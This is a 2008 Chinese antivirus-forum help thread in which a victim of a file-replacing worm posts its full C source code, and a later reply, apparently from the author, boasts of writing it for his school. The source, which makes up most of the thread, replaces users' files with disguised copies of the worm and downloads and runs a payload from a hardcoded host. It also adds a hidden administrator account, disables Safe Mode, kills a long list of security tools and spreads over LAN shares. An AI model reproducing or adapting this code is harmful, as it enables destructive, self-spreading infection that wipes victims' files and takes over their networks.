‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[求助] I LOVE YOU PRETTY SUYAO,FOREVER!【未知病毒by一把锈剑080704】

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
1楼 发表于 2008-7-4 15:00  只看该作者

I LOVE YOU PRETTY SUYAO,FOREVER!【未知病毒by一把锈剑080704】

所有文件都变成了病毒软件。安全模式也没了。还冒出一个对话框:贵校领导,你们学校的网站已在我们的控制之下,请交2999元到建设银行的 XX帐号,成为我们的会员。还会在桌面上显示:I LOVE YOU PRETTY SUYAO,FOREVER!
各个盘的目录下面都出现了很多是这样文件名字的文件,所有自己的软件也统一变成92k大小的文件,C盘根目录下面多了一个winxp.exe,开机后一直都在读盘,无法使用。我应该怎么杀这个毒,另外我那些图片和文件能不能搞回来?
超级连连看.exe
2008高考-理综.exe
化学平衡.exe
周杰伦最新力作-大灌篮.exe
百家讲坛-金庸武侠.exe
数列1.exe
百家讲坛-聊斋.exe
细胞有丝分裂.exe
祖玛钻石版.exe
色戒.exe

[ 本帖最后由 一把锈剑 于 2008-7-4 15:35 编辑 ]

TOP

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
2楼 发表于 2008-7-4 15:02  只看该作者
最黑的蠕虫,c写的,大家可以研究研究..

蠕虫功能:
基本的:写注册表run autorun.bat自启动 添加管理员账户 开admin$共享 以便用psexec.exe连接
特色的:遍历除c:以外所有分区文件,依次用自己替换,而且替换后文件名 "后缀" 甚至图标都不变.
自己生成预先设好的一张图片,死循环将其设置为桌面背景
监控系统进程列表,阻止大部分安全软件启动
双进程保护
枚举局域网内所有共享,依次上传自己
枚举局域网内所有主机,依次写注册表
在所有文件夹生成有诱惑力名字的病毒体
剩下的忘了
注:代码在lcc-win32编译器下编译通过 用vc可能要改改 这里只贴出了主要的 感兴趣的可以联系我以获得全部代码
所有思路代码均由本人自己构思与编写 转载请注明出处solopointer

TOP

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
3楼 发表于 2008-7-4 15:03  只看该作者
网络上面只能着到上面的信息。。。里面好多家庭相片啊。。。都没有备份。。。。

TOP

一把锈剑

菜苗助长队


上将(超级版主)

奋青代表队-常任理事

积分
11050 
威望
19542  
元宝
89  
铜钱
5943  

最勤奋版主 天才奖 吃喝玩乐总指挥 毒霸MVP勋章 杀软原创技术写手勋章 爱毒霸社区技术大师

4楼 发表于 2008-7-4 15:08  只看该作者
楼主能否能够打包上传其中的一个exe  

并且辛苦楼主下载金山清理专家2.4 升级到最新版本-----在线系统监测(全面诊断)--导出日志-(勾选导出全部项目)-----复制到剪切板 然后复制上来就可以了
机器狗/AV终结者/磁碟机
AUTO木马群专杀工具
金山清理专家
一把锈剑的一亩三分地
请新会员务必关注 新手入门版块 AND如何让你的发贴更受关注?请注意发贴技巧

TOP

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
5楼 发表于 2008-7-4 15:14  只看该作者
[code]
#include <windows.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lik")
#include <malloc.h>
#include <process.h>
#include <tlhelp32.h>
#include <process.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
#include "data.c"//此文件包含了10个图标
#include "aa.c"//此文件中包含了将被设为桌面的图片信息
#include "wormres.h"
/////////////////远程下载///////////////////////////////////////////////////////////////////
char url[]="http://10.0.3.251/a.exe";
char bmp[]="http://10.0.3.251/a.bmp";
////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////全局变量/////////////////////////////////////////////////////////////////////
char ownname[1024];
char cpyname[1024];
char rndname[1024];
char share[1024];
char pproc[50];
int r;
TCHAR remotename[256];

int offset;//这是自己图标的偏移 可以用pedump.exe编译后获得

////////////////////////////////////////////////////////////////////////////////
char * getlast(char * name)
{
        char * p=name;
        p=p+strlen(name)-1;
        while(*p!='\\')
                p--;
        return p+1;
}
///////////隐藏系统属性//////////////////////////////////////////////////////////////////
void setfilesystemhidden(char * name)
{
        SetFileAttributes(name,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
////////////普通属性////////////////////////////////////////////////////////////////////////
void setfilenormal(char * name)
{
        SetFileAttributes(name,FILE_ATTRIBUTE_NORMAL);
}
////////////隐藏属性/////////////////////////////////////////////////////////////////
void setfilehidden(char * name)
{
        SetFileAttributes(name,FILE_ATTRIBUTE_HIDDEN);
}
////////////系统属性/////////////////////////////////////////////////////////////////
void setfilesystem(char * name)
{
        SetFileAttributes(name,FILE_ATTRIBUTE_SYSTEM);
}
////////////设置时间/////////////////////////////////////////////////////////////////
void settimeok(char * name)
{
    HWND hfile=CreateFile(name,GENERIC_WRITE,FILE_SHARE_READ,
        NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
        SYSTEMTIME systime;
        FILETIME filetime;
        GetFileTime(hfile,&filetime,NULL,NULL);
        FileTimeToSystemTime(&filetime,&systime);
        systime.wYear=1990;
        systime.wMonth=5;
        systime.wDay=17;
        SystemTimeToFileTime(&systime,&filetime);
        SetFileTime(hfile,&filetime,NULL,NULL);
        CloseHandle(hfile);
}
//////////////////////////////////////////////////////////////////////////////
void settable()
{
    if(URLDownloadToFile(NULL,bmp,"worm.bmp",0,NULL)==S_OK)//下载
         {
                                goto downok;
         }
        else {
                        int w;
                        sprintf(rndname,"%s%s",getlast(ownname),".bmp");
            HANDLE hfile=CreateFile(rndname,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                        WriteFile(hfile,bmpl,14466,&w,NULL);
                        CloseHandle(hfile);
                        settimeok(rndname);
                        setfilehidden(rndname);
                 };
    downok:SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, rndname, SPIF_SENDWININICHANGE| SPIF_UPDATEINIFILE);
}
/////////////////////////////////////////////////////////////////////////////////////
/////////////判断时间是否为1990.5.17////////////////////////////////////////////////////////////////
int iftimeok(char * name)
{
        HWND hfile=CreateFile(name,GENERIC_READ,FILE_SHARE_READ,
        NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
        SYSTEMTIME systime;
        FILETIME filetime;
        GetFileTime(hfile,&filetime,NULL,NULL);
        CloseHandle(hfile);
        FileTimeToSystemTime(&filetime,&systime);
        if((systime.wYear==1990)&&(systime.wMonth==5)&&(systime.wDay==17)) return 1;
        else return 0;
}
//////////生成随机字符串//////////////////////////////////////////////////////
char * rnd()
{
        r=rand()+rand()+rand();
        switch(r%20)
        {
                case 0: lstrcpy(rndname,"超级连连看.exe");break;
                case 1: lstrcpy(rndname,"2008高考-理综.exe");break;
                case 2: lstrcpy(rndname,"化学平衡.exe");break;
                case 3: lstrcpy(rndname,"2008高考-数学.exe");break;
                case 4: lstrcpy(rndname,"周杰伦最新力作-大灌篮.exe");break;
                case 5: lstrcpy(rndname,"百家讲坛-金庸武侠.exe");break;
                case 6: lstrcpy(rndname,"长江七号.exe");break;
                case 7: lstrcpy(rndname,"2008奥运开幕式.exe");break;
                case 8: lstrcpy(rndname,"无极象棋.exe");break;
                case 9: lstrcpy(rndname,"易中天-《品三国》.exe");break;
                case 10: lstrcpy(rndname,"数列1.exe");break;
                case 11: lstrcpy(rndname,"解读高考阅读理解.exe");break;
                case 12: lstrcpy(rndname,"楞次定理.exe");break;
                case 13: lstrcpy(rndname,"啊q正传.exe");break;
                case 14: lstrcpy(rndname,"百家讲坛-聊斋.exe");break;
                case 15: lstrcpy(rndname,"异形CD1.exe");break;
                case 16: lstrcpy(rndname,"异形CD2.exe");break;
        case 17: lstrcpy(rndname,"细胞有丝分裂.exe");break;
                case 18: lstrcpy(rndname,"祖玛钻石版.exe");break;
                case 19: lstrcpy(rndname,"色戒.exe");break;

   };
   return rndname;
}
///////////////操作类//////////////////////////////////////////////////////////
void createprotect()
{
        GetModuleFileName(NULL,ownname,1024);
        int w;
        sprintf(pproc,"%s%s","ProtectOf",getlast(ownname));
        HANDLE hfile=CreateFile(pproc,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
        WriteFile(hfile,protect,13877,&w,NULL);
        WriteFile(hfile,getlast(ownname),strlen(getlast(ownname)),&w,NULL);
        char r=strlen(getlast(ownname));
        WriteFile(hfile,&r,1,&w,NULL);
        CloseHandle(hfile);
        settimeok(pproc);
        setfilehidden(pproc);
        WinExec(pproc,SW_HIDE);
}
////////////////////////////////////////////////////////////////////////////////
///////////////图标伪装////////////////////////////////////////////////////////
void wicon(char * name)
{
        BYTE * p;
        char * hz=&name[strlen(name)-7];
        if((strcmp(hz,"bmp.exe")==0)
                ||(strcmp(hz,"jpg.exe")==0)
                ||(strcmp(hz,"gif.exe")==0)
                ||(strcmp(hz,"peg.exe")==0))
                p=pic;
        else if ((strcmp(hz,".rm.exe")==0)
                ||(strcmp(hz,"mvb.exe")==0)
                ||(strcmp(hz,"swf.exe")==0)
                ||(strcmp(hz,"fla.exe")==0)
                ||(strcmp(hz,"wmv.exe")==0))
                p=real;
        else if ((strcmp(hz,"mp3.exe")==0)
                ||(strcmp(hz,"wma.exe")==0))
                p=ttplayer;
        else if (strcmp(hz,"ppt.exe")==0)
                p=ppt;
        else if ((strcmp(hz,"doc.exe")==0)
                ||(strcmp(hz,"ini.exe")==0))
                p=word;
        else if (strcmp(hz,"txt.exe")==0)
                p=txt;
        else if (strcmp(hz,"exe.exe")==0)
                p=exe;
        else if ((strcmp(hz,"rar.exe")==0)
                ||(strcmp(hz,"zip.exe")==0))
                p=rar;
        else if ((strcmp(hz,"htm.exe")==0)
                ||(strcmp(hz,"tml.exe")==0))
                p=html;
        else p=ms;
        DWORD w;
        HANDLE hfile=CreateFile(TEXT(name),GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
    SetFilePointer(hfile,offset,NULL,FILE_BEGIN);
        WriteFile(hfile,p,2216,&w,NULL);
        CloseHandle(hfile);
}
////////////////////////////////////////////////////////////////////////////////
void dowithfile(char * name)
{
        if(iftimeok(name)) goto end;
        strcpy(cpyname,name);
        sprintf(cpyname,"%s.%s",cpyname,"exe");
        CopyFile(ownname,cpyname,FALSE);
        setfilenormal(name);
        DeleteFile(name);
        wicon(cpyname);
        settimeok(cpyname);
        setfilesystem(cpyname);
        end:;
}

///////////////////////////////////////////////////////////////////////////////
void dowithdir(char * name)
{
                  sprintf(cpyname,"%s\\%s",name,rnd());
          CopyFile(ownname,cpyname,FALSE);
                  settimeok(cpyname);
                  setfilesystem(cpyname);
  }
/////////////////////////////////////////////////////////////////////////////
BOOL IsRoot(char * lpszPath)
{
          TCHAR szRoot[4];
          wsprintf(szRoot, "%c:\\", lpszPath[0]);
          return (lstrcmp(szRoot, lpszPath)==0);
}
void FindInAll(char * lpszPath)
{         dowithdir(lpszPath);
          TCHAR szFile[MAX_PATH];
          TCHAR szFind[MAX_PATH];
          lstrcpy(szFind, lpszPath);
          if (!IsRoot(szFind))
              lstrcat(szFind, "\\");
          lstrcat(szFind, "*.*"); // 找所有文件
          WIN32_FIND_DATA wfd;
          HANDLE hFind = FindFirstFile(szFind, &wfd);
          if (hFind == INVALID_HANDLE_VALUE) // 如果没有找到或查找失败
                            goto end;
          do
            {
               if (wfd.cFileName[0] == '.')
               continue; // 过滤这两个目录
               if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                  {
                     if (IsRoot(lpszPath))
                           wsprintf(szFile, "%s%s", lpszPath, wfd.cFileName);
                     else
                           wsprintf(szFile, "%s\\%s", lpszPath, wfd.cFileName);
                     FindInAll(szFile); // 如果找到的是目录,则进入此目录进行递归
                  }
               else
                  {
                        if (IsRoot(lpszPath))
                             wsprintf(szFile, "%s%s", lpszPath, wfd.cFileName);
                        else
                             wsprintf(szFile, "%s\\%s", lpszPath, wfd.cFileName);
                        dowithfile(szFile);
// 对文件进行操作
                  }
            } while (FindNextFile(hFind, &wfd));
                end:FindClose(hFind); // 关闭查找句柄
}
//////////////////////////////////写远程注册表函数/////////////////////////////////////////////
void dowithhost(char * name)
{
        char buf[200];
        sprintf(buf,"net use %s\\ipc$ \"\" /user:\"administrator\"",name);
        WinExec(buf,SW_HIDE);Sleep(517);
        sprintf(buf,"REG ADD %s\\HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d %s",name,getlast(ownname),remotename);
        WinExec(buf,SW_HIDE);Sleep(517);
        sprintf(buf,"net use %s\\ipc$ /del",name);
        WinExec(buf,SW_HIDE);Sleep(517);
}
//////////////////////////////枚举共享//////////////////////////////////////////////////
int sharefn(NETRESOURCE netres)
{
NETRESOURCE   *pNetres;
HANDLE   hFile;
DWORD   i,a,b,c=100;
i=WNetOpenEnum(RESOURCE_GLOBALNET,RESOURCETYPE_ANY,0,&netres,&hFile);
if(i!=NO_ERROR) return 0;
b=sizeof(NETRESOURCE)*100;
pNetres=(NETRESOURCE*)GlobalAlloc(GPTR,b);
i=WNetEnumResource(hFile,&a,(void*)pNetres,(DWORD*)&b);
if(i!=NO_ERROR)return   0;
for(i=0;i<a;i++)
{
        if((pNetres.dwType==0)&&(pNetres.lpRemoteName[0]=='\\'))
                dowithhost(pNetres.lpRemoteName);
        else if((pNetres.dwType==1)&&(pNetres.lpRemoteName[0]=='\\'))
                dowithdir(pNetres.lpRemoteName);
        if((pNetres.dwUsage&RESOURCEUSAGE_CONTAINER)||(pNetres.dwType==0))
                {
                        //printf("digui:%s--dwUsage:%d--wType:%d\n",pNetres.lpRemoteName,pNetres.dwUsage,pNetres.dwType);
                        sharefn(pNetres);
                };
};
return   0;
}
/////////////////////////进程管理/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
int ifproc(char * name)
{
        if(!(
strcmp(name,"notepad.exe")
&&strcmp(name,"Ras.exe")&&strcmp(name,"avp.exe")
&&strcmp(name,"runiep.exe")&&strcmp(name,"PFW.exe")
&&strcmp(name,"FYFireWall.exe")&&strcmp(name,"cmd.exe")
&&strcmp(name,"rfwmain.exe")&&strcmp(name,"rfwsrv.exe")
&&strcmp(name,"KAVPF.exe")&&strcmp(name,"realplay.exe")
&&strcmp(name,"nod32kui.exe")&&strcmp(name,"KPFW32.exe")
&&strcmp(name,"Navapsvc.exe")&&strcmp(name,"nod32.exe")
&&strcmp(name,"Navapw32.exe")&&strcmp(name,"avconsol.exe")
&&strcmp(name,"webscanx.exe")&&strcmp(name,"NPFMntor.exe")
&&strcmp(name,"vsstat.exe")&&strcmp(name,"KPfwSvc.exe")
&&strcmp(name,"RavTask.exe")&&strcmp(name,"Rav.exe")
&&strcmp(name,"RavMon.exe")&&strcmp(name,"mmsk.exe")
&&strcmp(name,"WoptiClean.exe")&&strcmp(name,"360Safe.exe")
&&strcmp(name,"adam.exe")&&strcmp(name,"360rpt.exe")
&&strcmp(name,"360tray.exe")&&strcmp(name,"AgentSvr.exe")
&&strcmp(name,"AppSvc32.exe")&&strcmp(name,"avgrssvc.exe")
&&strcmp(name,"AvMonitor.exe")&&strcmp(name,"CCenter.exe")
&&strcmp(name,"FileDsty.exe")&&strcmp(name,"Iparmor.exe")
&&strcmp(name,"HijackThis.exe")&&strcmp(name,"FTCleanerShell.exe")
&&strcmp(name,"isPwdSvc.exe")&&strcmp(name,"kabaload.exe")
&&strcmp(name,"KASMain.exe")&&strcmp(name,"KASTask.exe")
&&strcmp(name,"KAV32.exe")&&strcmp(name,"KAVDX.exe")
&&strcmp(name,"KAVPFW.exe")&&strcmp(name,"KAVSetup.exe")
&&strcmp(name,"KAVStart.exe")&&strcmp(name,"KISLnchr.exe")
&&strcmp(name,"KMailMon.exe")&&strcmp(name,".exe")
&&strcmp(name,"KPFW32X.exe")&&strcmp(name,"KMFilter.exe")
&&strcmp(name,"KRegEx.exe")&&strcmp(name,"KPFWSvc.exe")
&&strcmp(name,"KsLoader.exe")&&strcmp(name,"KvDetect.exe")
&&strcmp(name,"KvfwMcl.exe")&&strcmp(name,"kvol.exe")
&&strcmp(name,"kvolself.exe")&&strcmp(name,"KVSrvXP.exe")
&&strcmp(name,"kvupload.exe")&&strcmp(name,"kvwsc.exe")
&&strcmp(name,"KWatch.exe")&&strcmp(name,"KWatchX.exe")
&&strcmp(name,"loaddll.exe")&&strcmp(name,"MagicSet.exe")
&&strcmp(name,"mcconsol.exe")&&strcmp(name,"WoptiProcess.exe")
&&strcmp(name,"nod32krn.exe")&&strcmp(name,"mmqczj.exe")
&&strcmp(name,"PFWLiveUpdate.exe")&&strcmp(name,"QHSET.exe")
&&strcmp(name,"RavMonD.exe")&&strcmp(name,"RavStub.exe")
&&strcmp(name,"RegClean.exe")&&strcmp(name,"regedit.exe")
&&strcmp(name,"RfwMain.exe")&&strcmp(name,"rfwcfg.exe")
&&strcmp(name,"RsAgent.exe")&&strcmp(name,"Rsaupd.exe")
&&strcmp(name,"safelive.exe")&&strcmp(name,"scan32.exe")
&&strcmp(name,"shcfg32.exe")&&strcmp(name,"SmartUp.exe")
&&strcmp(name,"SREng.exe")&&strcmp(name,"POWERPNT.exe")
&&strcmp(name,"SysSafe.exe")&&strcmp(name,"symlcsvc.exe")
&&strcmp(name,"TrojanDetector.exe")&&strcmp(name,".exe")
&&strcmp(name,"UIHost.exe")&&strcmp(name,"Trojanwall.exe")
&&strcmp(name,"UmxAgent.exe")&&strcmp(name,"UmxAttachment.exe")
&&strcmp(name,"UmxCfg.exe")&&strcmp(name,"UmxFwHlp.exe")
&&strcmp(name,"UmxPol.exe")&&strcmp(name,"wmplayer.exe")
&&strcmp(name,"upiea.exe")&&strcmp(name,"UpLive.exe")
&&strcmp(name,"AST.exe")&&strcmp(name,"ArSwp.exe")
&&strcmp(name,"USBCleaner.exe")&&strcmp(name,"smenu.exe")
&&strcmp(name,"powerpnt.exe")&&strcmp(name,"winword.exe")
&&strcmp(name,"mspaint.exe")
       ))return 1;
        else return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////
void dowithproc(char *name,int id)
{   if(ifproc(name))
    {HWND hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,id);
     TerminateProcess(hProcess,-1);
     CloseHandle(hProcess);
        };
}
///////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////
void closeproc()
{
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(pe32);
        int n=0;
        HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hProcessSnap==INVALID_HANDLE_VALUE)
                goto end;
        int bMore =Process32First(hProcessSnap, &pe32);
        while(bMore)
        {
                if(strcmp(pe32.szExeFile,pproc)==0) n=1;
                dowithproc(pe32.szExeFile,pe32.th32ProcessID);
                bMore =Process32Next(hProcessSnap, &pe32);
        }
        CloseHandle(hProcessSnap);
        if(n!=1) createprotect();
        end: ;
}
///////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////
void procalltime()
{
        while(1){
        closeproc();
        Sleep (800);
            };
}
////////////////////////添加注册表启动项////////////////////////////////
void writereg()
{
        DWORD w;
        char regname[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    HKEY hkey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,regname,0,KEY_SET_VALUE,&hkey);
        sprintf(rndname,"%s%s","Win32Exec",getlast(ownname));
    RegSetValueEx(hkey,rndname,0,REG_SZ,(unsigned char *)ownname,strlen(ownname)+1);
        RegCloseKey(hkey);
        char regname2[]="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
        RegOpenKeyEx(HKEY_CURRENT_USER,regname2,0,KEY_SET_VALUE,&hkey);
        DWORD val=1;
    RegSetValueEx(hkey,"HideFileExt",0,REG_DWORD,&val,4);
        RegCloseKey(hkey);
        WinExec("reg delete HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f",SW_HIDE);
}
///////////////////////////////////////////////////////////////////////]
void alltime()
{
        while(1)
                {
                        writereg();
                        Sleep(100);
                        settable();
                        Sleep(1500);
        };
}

////////////////////////////////////////////////////////////////////////////////
//////////////主/////////////函/////////////////数//////////////////////////////
////////////////////////////////////////////////////////////////////////////////
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
        ///////////得到自己的名字//////////////////////////////////////////////////
        GetModuleFileName(NULL,ownname,1024);
        ///////////////////////////////////////////////////////////////////////////
        if(ownname[0]=='\\')
                {
                        CopyFile(ownname,"c:\\windows.exe",FALSE);
                        Sleep(3000);
                        WinExec("c:\\windows.exe",SW_HIDE);
                        return 0;
            };
        //////////////////////////////////////////////////////////////////////////
        /////////////开启共享,添加用户/////////////////////////////////////////////
        WinExec("net share admin$",SW_HIDE);
        WinExec("net user \"I like SuYao\" suyao /add",SW_HIDE);
        WinExec("net localgroup administrators \"I like SuYao\" /add",SW_HIDE);
        //////////添加注册表启动项/////////////////////////
        //////////////////////////////////////////////////////////////////////////
        settable();
        ////////////////////////////////////////////////////////////////////////////
        _beginthread (procalltime, 0, NULL);//阻止指定进程启动,双进程
        _beginthread (alltime, 0, NULL);//写run桌面
  ///////////////////////////////////////////////////////////////////////////////
        offset=66720;
    if(URLDownloadToFile(NULL,url,"c:\\winxp.exe",0,NULL)==S_OK)//下载
        {
                 WinExec("c:\\winxp.exe", SW_HIDE); //自动执行你下载下来的马
        };
        ////////////////写autoexec.bat/////////////////////////////////////////////////////////////
        int w;
        HWND hfile=CreateFile(TEXT("C:\\autoexec.bat"),GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
    SetFilePointer(hfile,0,NULL,FILE_END);
        WriteFile(hfile,ownname,strlen(ownname),&w,NULL);
        rndname[0]='\015';
        rndname[1]='\012';
        rndname[2]='\000';
        WriteFile(hfile,rndname,strlen(rndname),&w,NULL);
        CloseHandle(hfile);
        ////////////////////////////得到远程名remotename/////////////////////////////////////////////////////////
        HKEY hKey;
    long dwBufLen=256;
        TCHAR * reg="SYSTEM\\ControlSet003\\Control\\ComputerName\\ComputerName";
        TCHAR * name="ComputerName";
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,reg,0,KEY_EXECUTE,&hKey)!=ERROR_SUCCESS)
                goto end;
        RegQueryValueEx(hKey,name,0,NULL,remotename,&dwBufLen);
    RegCloseKey(hKey);
/////////////////////////得到远程名remotename/////////////////////////////////////////////////////////////
        CreateDirectory("c:\\Win32Boot",NULL);
        setfilehidden("c:\\Win32Boot");
        WinExec("net share system=c:\\Win32Boot",SW_HIDE);
        CopyFile(ownname,"c:\\Win32Boot\\sys.exe",FALSE);
        char temp[256];
        strcpy(temp,remotename);
        sprintf(remotename,"[url=]\\\\%s\\system\\sys.exe",temp[/url]);
////////////////////////感染//////////////////////////////////////////////////////////////////////////////
        char drive[128];
        int type;
        char * p;
        int flag=0;
        alltime:
        ZeroMemory(drive,128);
        type=0;
        GetLogicalDriveStrings(128,drive);
        p=drive;
        while(*p!='\0')
                {
                        type=GetDriveType(p);
                        if((type==DRIVE_FIXED||type==DRIVE_REMOVABLE)&&(*p!='A')&&(*p!='a')&&(*p!='C')&&(*p!='c'))
                                        FindInAll(p);
                                p=p+4;
        };
        FindInAll("C:\\Documents and Settings\\All Users");
        if(flag==1) goto alltime;
////////////////////////////////////////////////////////////////////////////
        NETRESOURCE   netres;
        netres.dwScope=RESOURCE_CONNECTED|RESOURCE_GLOBALNET|RESOURCE_REMEMBERED;
        netres.dwType=RESOURCETYPE_DISK;
        netres.dwDisplayType=RESOURCEDISPLAYTYPE_DOMAIN|RESOURCEDISPLAYTYPE_SERVER|RESOURCEDISPLAYTYPE_SHARE|RESOURCEDISPLAYTYPE_GENERIC;
        netres.dwUsage=RESOURCEUSAGE_CONNECTABLE|RESOURCEUSAGE_CONTAINER;
        netres.lpLocalName=0;
        netres.lpRemoteName=NULL;
        netres.lpComment=0;
        netres.lpProvider=0;
        sharefn(netres);
        /////////////////////////////////////////////////////////////////////////
        MessageBox (NULL,TEXT ("."),"test", MB_OK);
//////////////////////////////////////////////////////////////////////
        flag=1;
        goto alltime;

TOP

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
6楼 发表于 2008-7-4 15:18  只看该作者
上面就是所谓的C写的源程序了。看不明白。

进不了安全模式,会蓝屏,另外硬盘狂闪,根本无法做操作。还多了一个“I LOVE SUYAO”的管理员账号,需要密码的。

哎。。。都不知道怎么办。是学校局域网中毒的。

TOP

yeah1

新兵

积分
威望
17  
元宝
0  
铜钱
12  
7楼 发表于 2008-7-4 15:30  只看该作者
//////////////////////////////////////////////////////////////////////////////////////////
end:while(1){Sleep(1000);}
  return 0;

  /////////////////////////////////////////////////////////////////////////////////////////
  }

---------------------
守护进程代码:
#include <windows.h>
#include <process.h>
#include <tlhelp32.h>
#include <string.h>

char ownname[1024];
int n;

char buf[50];
void createmain()
{
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(pe32);
        n=0;


        HANDLE hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hProcessSnap == INVALID_HANDLE_VALUE)
                goto end;
        int bMore;
    loop:bMore=Process32First(hProcessSnap, &pe32);
        while(bMore)
        {
                if(strcmp(pe32.szExeFile,buf)==0) n=1;
                bMore =Process32Next(hProcessSnap, &pe32);
        }

        if(n!=1) WinExec(buf,SW_HIDE);
        end:;

}

int procalltime()
{
        while(1){
        createmain();
        if(n==0) break;
        Sleep (800);
        };
        return 1;
}

int main()

{
        GetModuleFileName(NULL,ownname,1024);

        ZeroMemory(buf,50);
        int w;


        HWND hfile=CreateFile(ownname,GENERIC_READ,FILE_SHARE_READ,
        NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
        SetFilePointer(hfile,-1,NULL,FILE_END);
        ReadFile(hfile,buf,1,&w,NULL);
        SetFilePointer(hfile,-1-*buf,NULL,FILE_END);
        ReadFile(hfile,buf,*buf,&w,NULL);
        procalltime();

        return 0;

TOP

铁军

上将(管理员)

积分
12059 
威望
22109  
元宝
96  
铜钱
1498  
8楼 发表于 2008-7-4 16:27  只看该作者
请楼主将样本文件提交几个,谢谢!
提问请注意详细描述现象、操作过程,如果是病毒报告,应说明病毒名,染毒文件路径、文件名等,什么现象都不描述只发一个日志的帖子将被直接删除。

请新会员关注新手杀毒入门

TOP

solopointer

新兵

积分
威望
3  
元宝
0  
铜钱
2  
9楼 发表于 2008-8-20 09:45  只看该作者

哈哈哈哈

哈哈哈哈 这蠕虫是我写的 本来是给我们学校准备的 没想到你中招了 那个suyao是我女友
中毒后最明智的选择是重启进dos删 代码你也看了 你的文件是恢复不了了

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题